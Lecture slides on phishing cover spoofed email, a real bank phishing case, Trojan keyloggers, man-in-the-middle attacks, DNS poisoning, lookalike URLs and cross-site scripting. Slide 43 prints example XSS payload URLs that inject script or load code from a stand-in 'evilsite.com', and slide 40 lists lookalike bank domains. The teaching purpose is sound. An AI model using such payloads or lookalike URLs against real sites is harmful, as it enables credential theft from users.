2. About me
Currently, Lecturer in this department for
351 days
Former Research Intern in M3C Laboratory,
University of Bolton, UK
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 2
3. For you
Email me at rushdecoder@yahoo.com if
you want
My homepage and course materials are at
http://rushdishams.googlepages.com
You need to join
http://groups.google.com/group/csebatche
sofrushdi
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 3
4. Phishing
The number of unique e-mail-based fraud
attacks detected in November 2005 was
16,882, almost double the 8,975 attacks
launched in November 2004, said the report
(Anti-Phishing Working Group)
Phishing e-mails pretend to come from
legitimate companies, such as banks and e-
commerce sites
Used by criminals to try and trick Web users
into revealing personal information and
account detailsRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 4
5. Phishing
The number of brands targeted increased
by nearly 50 percent over the course of
2005, from 64 percent to 93 percent in
November 2006
"One big attack will temporarily hurt a
brand, but the increase in e-commerce is
not slowing down,"
(Mark Murtagh, Websense technical director)
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 5
6. Phishing
Top brands continue to be hijacked, with
phishers using established names to try to lure
people to their sites
eBay is often spoofed, for obvious reasons
Google is increasingly being targeted because
of its expansion into different business
application models.
The big banking names are used too--HSBC,
Citigroup, Lloyds--all the major brands
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 6
7. Phishing
There's no point in using local names if the
attack is global
Attacks are becoming increasingly
sophisticated
Web sites are hosting keylogging malicious
software
Before, people had to click on a site to
download malicious code.
If they thought a web site 'phishy,' they could
leave and probably not be harmed.
Now. with most phishing sites they just have to
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 7
8. Phishing
Twenty-five percent of those sites now host
keylogging code
If you visit one you will probably open yourself
to identity theft or fraud
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 8
9. Exploiting the Weakness
Why is it that Crooks are able to mount an
attack?
What are the weaknesses that they exploit?
Richness of functionality
Complex systems can have program bugs
Increasing interconnectivity
Separate functions of any system are combined
and interconnected via Internet
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 9
10. Exploiting the Weakness
Expanding market in exploits
Very few people requires as the technical
gadgets are impressive and cheap
The scale of content based attacks
Everyone uses e-mails and e-mails are
exploitable. Then why not?
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 10
11. Social Engineering Factors
Phishing attacks rely upon a mix of technical
deceit and social engineering practices.
In the majority of cases the Phisher must
persuade the victim
The victim intentionally performs a series of
actions that will provide access to
confidential information
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 11
12. Social Engineering Factors
Communication channels such as email,
web-pages, IRC and instant messaging
services are popular.
Phisher must impersonate a trusted source
(e.g. the helpdesk of their bank, automated
support response from their favourite
online retailer, etc.) for the victim to
believe.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 12
14. Phishing Techniques
Phishing attacks initiated by email are the
most common.
Using Trojan Network, Phishers can deliver
specially crafted emails to millions of
legitimate “live” email addresses within a
few hours
Sometimes phishers purchase e-mail
address
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 14
15. Phishing Techniques
Utilising well known flaws in the common
mail server communication protocol
(SMTP), Phishers are able to create emails
with fake “Mail From:” headers and
impersonate any organisation they choose.
Any customer replies to the phishing email
will be sent to them.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 15
16. Phishing Techniques
Official looking and sounding emails
Copies of legitimate corporate emails with
minor URL changes
HTML based email used to obfuscate target
URL information
Standard virus/worm attachments to emails
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 16
17. Phishing Techniques
A plethora of anti spam-detection inclusions
Crafting of “personalised” or unique email
messages
Fake postings to popular message boards
and mailing lists
Use of fake “Mail From:” addresses and
open mail relays for disguising the source of
the email
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 17
18. A real-life phishing example
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 18
19. Things to note
The email was sent in HTML format
Lower-case L’s have been replaced with
upper-case I’s. This is used to help bypass
many standard anti-spam filters
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 19
20. Things to note
Within the HTML-based email, the URL link
https://oIb.westpac.com.au/ib/defauIt.asp in fact
points to a escape-encoded version of the following
URL:
http://olb.westpac.com.au.userdll.com:4903/ib/index.
htm
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 20
22. Things to note
The non-standard HTTP port of 4903 can be
attributed to the fact that the Phishers fake
site was hosted on a third-party PC that had
been previously compromised by an
attacker Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 22
23. Things to note
Recipients that clicked on the link were
then forwarded to the real Westpac
application.
However a JavaScript popup window
containing a fake login page was presentedRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 23
24. Things to note
This fake login window was designed to capture and
store the recipient’s authentication credentials
JavaScript also submitted the authentication
information to the real Westpac application
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 24
25. Where are they standing now?
The inclusion of HTML disguised links
The use of third-party supplied, or fake,
banner advertising graphics to lure
customers
The use of web-bugs (hidden items within
the page – such as a zero-sized graphic) to
track a potential customer
The use of pop-up or frameless windows to
disguise the true source of the Phishers
message.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 25
26. Where are they standing now?
Embedding malicious content within the
viewable web-page
installs software of the Phishers choice (e.g.
key-loggers, screen-grabbers, back-doors
and other Trojan horse programs).
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 26
28. IRC and IM
New on the Phishers radar, IRC and Instant
Messaging (IM) forums are likely to become
a popular phishing ground.
The common usage of Bots (automated
programs that listen and participate in
group discussions) in many of the popular
channels,
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 28
29. Trojan Hosts
the delivery source is increasingly becoming
home PC’s that have been previously
compromised.
Trojan horse program has been installed
which allows Phishers (along with
Spammers, Warez Pirates, DDoS Bots, etc.)
to use the PC as a message propagator.
tracking back a Phishing attack to an
individual initiating criminal is extremely
difficult.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 29
30. Trojan Hosts
the installation of Trojan horse software is
on the increase, despite the efforts of large
anti-virus companies.
operate large networks of Trojan
deployments (networks consisting of
thousands of hosts are not uncommon)
Phishers must be selective about the
information they wish to record or be faced
with information overload.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 30
31. Information Specific Trojans
You have come across a file named
JavaUtil.zip.
But you forgot that you have “do not show
known file extensions” in your Windows
setting.
Hmm, then JavaUtil.zip originally maybe a
.exe file whose full name is JavaUtil.zip.exe
You, unfortunately, click that zip file to
unzip it.
You are doomed!
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 31
32. Information Specific Trojans
Early in 2004, a Phisher created a custom key-logger
Trojan.
The Trojan key-logger was designed specifically to
capture all key presses within windows with the titles
of various names including:- commbank,
Commonwealth, NetBank, Citibank, Bank of America,
e-gold, e-bullion, e-Bullion, evocash, EVOCash,
EVOcash, intgold, INTGold, paypal, PayPal, bankwest,
Bank West, BankWest, National Internet Banking, cibc,
CIBC, scotiabank and ScotiaBank
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 32
34. Man in the Middle Attacks
the attacker situates themselves between
the customer and the real web-based
application, and proxies all communications
between the systems.
This form of attack is successful for both
HTTP and HTTPS communications.
The customer connects to the attackers
server as if it was the real site
The attackers server makes a simultaneous
connection to the real site.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 34
35. Man in the Middle Attacks
The attackers server then proxies all
communications between the customer and
the real web-based application server
In the case of secure HTTPS
communications, an SSL connection is
established between the customer and the
attackers proxy
while the attackers proxy creates its own
SSL connection between itself and the real
server.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 35
36. Man in the Middle Attacks
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 36
37. Man in the Middle Attacks
The attacker must be able to direct the
customer to their proxy server instead of
the real server.
This may be carried out through a number
of methods:
Transparent Proxies
DNS Cache Poisoning
URL Obfuscation
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 37
38. Transparent Proxies
Situated on the same network segment or
located on route to the real server
a transparent proxy service can intercept all
data by forcing all outbound HTTP and
HTTPS traffic through itself.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 38
39. DNS Cache Poisoning
be used to disrupt normal traffic routing by
injecting false IP addresses for key domain
names.
the attacker poisons the DNS cache of a
network firewall so that all traffic destined
for the MyBank IP address now resolves to
the attackers proxy server IP address
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 39
40. URL Obfuscation
the attacker tricks the customer into connecting to
their proxy server instead of the real server.
the customer may follow a link to
http://privatebanking.mybank.com.ch
http://mybank.privatebanking.com
http://privatebanking.mybonk.com
http://privatebanking.mybánk.com
http://privatebanking.mybank.hackproof.com
And the real one is
http://privatebanking.mybank.com
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 40
42. Cross Site Scripting (XSS)
make use of custom URL or code injection
into a valid web-based application URL
the result of poor web-application
development processes.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 42
43. Cross Site Scripting (XSS)
Full HTML substitution such as:
http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm
Inline embedding of scripting content, such
as:
http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode
Forcing the page to load external scripting
code, such as:
http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 43
44. Cross Site Scripting (XSS)
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 44
48. References
The Phishing Guide by Next Generation
Security Software Software Limited.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 48
49. Related Papers
Technical Trends in Phishing Attacks by
Jason Milletary
Why Phishing Works by Dhamija et al.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 49